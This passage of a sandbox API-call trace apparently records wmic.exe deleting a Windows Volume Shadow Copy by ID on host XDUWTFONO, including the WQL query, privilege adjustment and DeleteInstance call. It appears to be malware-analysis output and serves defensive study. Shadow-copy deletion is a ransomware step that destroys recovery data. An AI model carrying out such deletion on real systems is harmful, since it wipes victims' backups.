wszName="Authority", lFlags=0, pVal=0x10f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35a648, varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35a648, varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.161] free (_Block=0x1dcb80) [0097.161] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0097.161] IUnknown:Release (This=0x1f709c0) returned 0x1 [0097.161] GetCurrentThreadId () returned 0xb38 [0097.161] ??0CHString@@QEAA@XZ () returned 0x10f2f8 [0097.161] malloc (_Size=0x18) returned 0x1dcb80 [0097.161] IWbemClassObject:Get (in: This=0x1f704e0, wszName="__RELPATH", lFlags=0, pVal=0x10f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x10f320*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0097.161] free (_Block=0x1dcb80) [0097.161] malloc (_Size=0x18) returned 0x1dcb80 [0097.162] GetCurrentThreadId () returned 0xb38 [0097.162] ??0CHString@@QEAA@XZ () returned 0x10f178 [0097.162] ??0CHString@@QEAA@PEBG@Z () returned 0x10f190 [0097.162] ??0CHString@@QEAA@AEBV0@@Z () returned 0x10f120 [0097.162] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0097.162] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x1dd020 [0097.162] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0097.162] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x10f0e0 [0097.162] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x10f128 [0097.162] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f190 [0097.162] ??1CHString@@QEAA@XZ () returned 0x2360301 [0097.162] ??1CHString@@QEAA@XZ () returned 0x2360301 [0097.162] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x10f0e8 [0097.162] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f120 [0097.162] ??1CHString@@QEAA@XZ () returned 0x1 [0097.162] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x1dd090 [0097.162] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0097.162] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x10f0e0 [0097.162] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x10f128 [0097.162] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f190 [0097.162] ??1CHString@@QEAA@XZ () returned 0x2360301 [0097.162] ??1CHString@@QEAA@XZ () returned 0x2360301 [0097.162] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x10f0e8 [0097.162] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f120 [0097.162] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0097.162] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0097.162] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0097.162] malloc (_Size=0x18) returned 0x1dcba0 [0097.162] malloc (_Size=0x18) returned 0x1dcc00 [0097.162] malloc (_Size=0x18) returned 0x1dcc20 [0097.162] malloc (_Size=0x18) returned 0x1dcc40 [0097.163] malloc (_Size=0x18) returned 0x1dcc60 [0097.163] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0097.163] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0097.163] malloc (_Size=0x18) returned 0x1dcc80 [0097.163] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0097.163] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0097.163] malloc (_Size=0x18) returned 0x1dcca0 [0097.163] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0097.163] SysStringLen (param_1="\"") returned 0x1 [0097.163] free (_Block=0x1dcc80) [0097.163] free (_Block=0x1dcc60) [0097.163] free (_Block=0x1dcc40) [0097.163] free (_Block=0x1dcc20) [0097.163] free (_Block=0x1dcc00) [0097.163] free (_Block=0x1dcba0) [0097.163] IWbemServices:GetObject (in: This=0x1f63b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x10f168*=0x0, ppCallResult=0x0 | out: ppObject=0x10f168*=0x1f70a50, ppCallResult=0x0) returned 0x0 [0097.164] malloc (_Size=0x18) returned 0x1dcba0 [0097.164] IWbemClassObject:Get (in: This=0x1f70a50, wszName="Text", lFlags=0, pVal=0x10f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff672ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x10f1a0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x354aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2de030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0097.164] free (_Block=0x1dcba0) [0097.165] SafeArrayGetLBound (in: psa=0x354aa0, nDim=0x1, plLbound=0x10f180 | out: plLbound=0x10f180) returned 0x0 [0097.165] SafeArrayGetUBound (in: psa=0x354aa0, nDim=0x1, plUbound=0x10f170 | out: plUbound=0x10f170) returned 0x0 [0097.165] SafeArrayGetElement (in: psa=0x354aa0, rgIndices=0x10f164, pv=0x10f1b8 | out: pv=0x10f1b8) returned 0x0 [0097.165] malloc (_Size=0x18) returned 0x1dcba0 [0097.165] malloc (_Size=0x18) returned 0x1dcc00 [0097.165] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0097.165] free (_Block=0x1dcba0) [0097.165] IUnknown:Release (This=0x1f70a50) returned 0x0 [0097.165] free (_Block=0x1dcca0) [0097.165] ??1CHString@@QEAA@XZ () returned 0x2360301 [0097.165] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0097.165] free (_Block=0x1dcb80) [0097.165] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0097.165] lstrlenW (lpString="Shadow copy management.") returned 23 [0097.165] malloc (_Size=0x30) returned 0x1d85c0 [0097.165] lstrlenW (lpString="Shadow copy management.") returned 23 [0097.165] free (_Block=0x1dcc00) [0097.165] IUnknown:Release (This=0x1f704e0) returned 0x0 [0097.165] free (_Block=0x1dcbc0) [0097.165] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0097.165] lstrlenW (lpString="PATH") returned 4 [0097.165] lstrlenW (lpString="where") returned 5 [0097.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0097.165] lstrlenW (lpString="WHERE") returned 5 [0097.165] lstrlenW (lpString="where") returned 5 [0097.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0097.165] lstrlenW (lpString="/") returned 1 [0097.166] lstrlenW (lpString="ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'") returned 43 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0097.166] lstrlenW (lpString="-") returned 1 [0097.166] lstrlenW (lpString="ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'") returned 43 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0097.166] lstrlenW (lpString="ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'") returned 43 [0097.166] malloc (_Size=0x58) returned 0x1dd020 [0097.166] lstrlenW (lpString="ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'") returned 43 [0097.166] lstrlenW (lpString="/") returned 1 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0097.166] lstrlenW (lpString="-") returned 1 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] malloc (_Size=0xe) returned 0x1dcbc0 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] lstrlenW (lpString="GET") returned 3 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0097.166] lstrlenW (lpString="LIST") returned 4 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0097.166] lstrlenW (lpString="SET") returned 3 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0097.166] lstrlenW (lpString="CREATE") returned 6 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0097.166] lstrlenW (lpString="CALL") returned 4 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0097.166] lstrlenW (lpString="ASSOC") returned 5 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0097.166] lstrlenW (lpString="DELETE") returned 6 [0097.166] lstrlenW (lpString="delete") returned 6 [0097.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0097.167] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.167] malloc (_Size=0x3e) returned 0x1dd080 [0097.167] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.167] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0097.167] malloc (_Size=0x18) returned 0x1dcc00 [0097.167] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0097.167] lstrlenW (lpString="FROM") returned 4 [0097.167] lstrlenW (lpString="*") returned 1 [0097.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0097.167] malloc (_Size=0x18) returned 0x1dcb80 [0097.167] free (_Block=0x1dcc00) [0097.167] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0097.167] lstrlenW (lpString="FROM") returned 4 [0097.167] lstrlenW (lpString="from") returned 4 [0097.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0097.167] malloc (_Size=0x18) returned 0x1dcc00 [0097.167] free (_Block=0x1dcb80) [0097.167] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0097.167] malloc (_Size=0x18) returned 0x1dcb80 [0097.167] free (_Block=0x1dcc00) [0097.167] free (_Block=0x1dd080) [0097.167] free (_Block=0x1dcb80) [0097.167] lstrlenW (lpString="SET") returned 3 [0097.167] lstrlenW (lpString="delete") returned 6 [0097.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0097.167] lstrlenW (lpString="CREATE") returned 6 [0097.168] lstrlenW (lpString="delete") returned 6 [0097.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0097.168] free (_Block=0x1dcef0) [0097.168] malloc (_Size=0x8) returned 0x1d6f20 [0097.168] lstrlenW (lpString="GET") returned 3 [0097.168] lstrlenW (lpString="delete") returned 6 [0097.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0097.168] lstrlenW (lpString="LIST") returned 4 [0097.168] lstrlenW (lpString="delete") returned 6 [0097.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0097.168] lstrlenW (lpString="ASSOC") returned 5 [0097.168] lstrlenW (lpString="delete") returned 6 [0097.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0097.168] WbemLocator:IUnknown:AddRef (This=0x1f51390) returned 0x3 [0097.168] free (_Block=0x3bdfb0) [0097.168] lstrlenW (lpString="") returned 0 [0097.168] lstrlenW (lpString="XDUWTFONO") returned 9 [0097.168] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0097.168] lstrlenW (lpString="XDUWTFONO") returned 9 [0097.168] malloc (_Size=0x14) returned 0x1dcb80 [0097.168] lstrlenW (lpString="XDUWTFONO") returned 9 [0097.168] GetCurrentThreadId () returned 0xb38 [0097.168] GetCurrentProcess () returned 0xffffffffffffffff [0097.168] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x10f540 | out: TokenHandle=0x10f540*=0x27c) returned 1 [0097.168] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10f538 | out: TokenInformation=0x0, ReturnLength=0x10f538) returned 0 [0097.168] malloc (_Size=0x118) returned 0x1dd080 [0097.168] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x1dd080, TokenInformationLength=0x118, ReturnLength=0x10f538 | out: TokenInformation=0x1dd080, ReturnLength=0x10f538) returned 1 [0097.168] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x1dd080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-482999972, Attributes=0x1065), (Luid.LowPart=0x0, Luid.HighPart=1953520, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0097.169] free (_Block=0x1dd080) [0097.169] CloseHandle (hObject=0x27c) returned 1 [0097.169] lstrlenW (lpString="GET") returned 3 [0097.169] lstrlenW (lpString="delete") returned 6 [0097.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0097.169] lstrlenW (lpString="LIST") returned 4 [0097.169] lstrlenW (lpString="delete") returned 6 [0097.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0097.169] lstrlenW (lpString="SET") returned 3 [0097.169] lstrlenW (lpString="delete") returned 6 [0097.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0097.169] lstrlenW (lpString="CALL") returned 4 [0097.169] lstrlenW (lpString="delete") returned 6 [0097.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0097.169] lstrlenW (lpString="ASSOC") returned 5 [0097.169] lstrlenW (lpString="delete") returned 6 [0097.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0097.169] lstrlenW (lpString="CREATE") returned 6 [0097.169] lstrlenW (lpString="delete") returned 6 [0097.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0097.169] lstrlenW (lpString="DELETE") returned 6 [0097.169] lstrlenW (lpString="delete") returned 6 [0097.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0097.169] malloc (_Size=0x18) returned 0x1dcc00 [0097.169] lstrlenA (lpString="") returned 0 [0097.169] malloc (_Size=0x2) returned 0x3bdfb0 [0097.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff60314c, cbMultiByte=-1, lpWideCharStr=0x3bdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0097.170] free (_Block=0x3bdfb0) [0097.170] malloc (_Size=0x18) returned 0x1dcca0 [0097.170] lstrlenA (lpString="") returned 0 [0097.170] malloc (_Size=0x2) returned 0x3bdfb0 [0097.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff60314c, cbMultiByte=-1, lpWideCharStr=0x3bdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0097.170] free (_Block=0x3bdfb0) [0097.170] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.170] malloc (_Size=0x3e) returned 0x1dd080 [0097.170] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.170] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0097.170] malloc (_Size=0x18) returned 0x1dcba0 [0097.170] free (_Block=0x1dcca0) [0097.170] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0097.170] lstrlenW (lpString="FROM") returned 4 [0097.170] lstrlenW (lpString="*") returned 1 [0097.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0097.170] malloc (_Size=0x18) returned 0x1dcca0 [0097.170] free (_Block=0x1dcba0) [0097.170] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0097.170] lstrlenW (lpString="FROM") returned 4 [0097.170] lstrlenW (lpString="from") returned 4 [0097.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0097.170] malloc (_Size=0x18) returned 0x1dcba0 [0097.171] free (_Block=0x1dcca0) [0097.171] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0097.171] malloc (_Size=0x18) returned 0x1dcca0 [0097.171] free (_Block=0x1dcba0) [0097.171] free (_Block=0x1dd080) [0097.171] malloc (_Size=0x18) returned 0x1dcba0 [0097.171] malloc (_Size=0x18) returned 0x1dcc20 [0097.171] malloc (_Size=0x18) returned 0x1dcc40 [0097.171] malloc (_Size=0x18) returned 0x1dcc60 [0097.171] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0097.171] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0097.171] malloc (_Size=0x18) returned 0x1dcc80 [0097.171] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0097.171] SysStringLen (param_1=" WHERE ") returned 0x7 [0097.171] malloc (_Size=0x18) returned 0x1dccc0 [0097.171] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0097.171] SysStringLen (param_1="ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'") returned 0x2b [0097.171] free (_Block=0x1dcc00) [0097.171] free (_Block=0x1dcc80) [0097.171] free (_Block=0x1dcc60) [0097.171] free (_Block=0x1dcc40) [0097.172] free (_Block=0x1dcc20) [0097.172] free (_Block=0x1dcba0) [0097.172] ??0CHString@@QEAA@XZ () returned 0x10f4b0 [0097.172] GetCurrentThreadId () returned 0xb38 [0097.172] malloc (_Size=0x18) returned 0x1dcba0 [0097.172] malloc (_Size=0x18) returned 0x1dcc20 [0097.172] malloc (_Size=0x18) returned 0x1dcc40 [0097.172] malloc (_Size=0x18) returned 0x1dcc60 [0097.172] malloc (_Size=0x18) returned 0x1dcc80 [0097.172] SysStringLen (param_1="\\\\") returned 0x2 [0097.172] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0097.172] malloc (_Size=0x18) returned 0x1dcc00 [0097.172] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0097.172] SysStringLen (param_1="\\") returned 0x1 [0097.172] malloc (_Size=0x18) returned 0x1dcce0 [0097.172] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0097.172] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0097.172] free (_Block=0x1dcc00) [0097.172] free (_Block=0x1dcc80) [0097.173] free (_Block=0x1dcc60) [0097.173] free (_Block=0x1dcc40) [0097.173] free (_Block=0x1dcc20) [0097.173] free (_Block=0x1dcba0) [0097.173] malloc (_Size=0x18) returned 0x1dcba0 [0097.173] malloc (_Size=0x18) returned 0x1dcc20 [0097.173] malloc (_Size=0x18) returned 0x1dcc40 [0097.173] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f51390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff6729d0 | out: ppNamespace=0xff6729d0*=0x1f63c18) returned 0x0 [0097.177] free (_Block=0x1dcc40) [0097.177] free (_Block=0x1dcc20) [0097.177] free (_Block=0x1dcba0) [0097.177] CoSetProxyBlanket (pProxy=0x1f63c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0097.177] free (_Block=0x1dcce0) [0097.177] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0097.177] ??0CHString@@QEAA@XZ () returned 0x10f400 [0097.177] GetCurrentThreadId () returned 0xb38 [0097.177] malloc (_Size=0x18) returned 0x1dcce0 [0097.177] lstrlenA (lpString="") returned 0 [0097.177] malloc (_Size=0x2) returned 0x3bdfb0 [0097.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff60314c, cbMultiByte=-1, lpWideCharStr=0x3bdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0097.177] free (_Block=0x3bdfb0) [0097.177] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'") returned 0x50 [0097.177] SysStringLen (param_1="") returned 0x0 [0097.177] free (_Block=0x1dcce0) [0097.177] malloc (_Size=0x18) returned 0x1dcce0 [0097.177] IWbemServices:ExecQuery (in: This=0x1f63c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'", lFlags=0, pCtx=0x0, ppEnum=0x10f408 | out: ppEnum=0x10f408*=0x1f63d18) returned 0x0 [0097.224] free (_Block=0x1dcce0) [0097.224] CoSetProxyBlanket (pProxy=0x1f63d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0097.227] IEnumWbemClassObject:Next (in: This=0x1f63d18, lTimeout=-1, uCount=0x1, apObjects=0x10f410, puReturned=0x10f420 | out: apObjects=0x10f410*=0x1f63d80, puReturned=0x10f420*=0x1) returned 0x0 [0097.228] malloc (_Size=0x18) returned 0x1dcce0 [0097.228] IWbemClassObject:Get (in: This=0x1f63d80, wszName="__PATH", lFlags=0, pVal=0x10f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.228] free (_Block=0x1dcce0) [0097.228] malloc (_Size=0x800) returned 0x1dd080 [0097.228] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x1dd080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0097.228] FormatMessageW (in: dwFlags=0x2500, lpSource=0x1dd080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x10f358, nSize=0x0, Arguments=0x10f368 | out: lpBuffer="뚐3") returned 0x67 [0097.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0097.228] malloc (_Size=0x68) returned 0x1dd890 [0097.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x1dd890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0097.228] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff672ab0 [0097.228] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0097.229] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0097.229] free (_Block=0x1dd890) [0097.229] free (_Block=0x1dd080) [0097.229] LocalFree (hMem=0x33b690) returned 0x0 [0097.229] IWbemServices:DeleteInstance (in: This=0x1f63c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) 